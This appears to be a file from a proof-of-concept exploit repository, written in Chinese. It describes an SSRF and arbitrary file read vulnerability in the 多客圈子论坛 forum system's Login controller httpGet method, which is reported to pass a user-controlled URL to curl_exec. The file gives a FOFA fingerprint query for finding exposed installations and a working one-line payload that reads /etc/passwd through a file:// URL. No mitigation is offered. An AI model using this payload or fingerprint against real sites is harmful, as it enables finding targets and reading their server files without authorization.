POC/wpoc/多客圈子论坛系统/多客圈子论坛前台SSRF漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

476 B
Raw Blame History

多客圈子论坛前台SSRF漏洞

/app/api/controller/Login.php 控制器中httpGet方法存在curl_exec函数且传参可控导致任意文件读取+SSRF漏洞

fofa

"/static/index/js/jweixin-1.2.0.js"

poc

/index.php/api/login/httpGet?url=file:///etc/passwd

image-20240621195011935

漏洞来源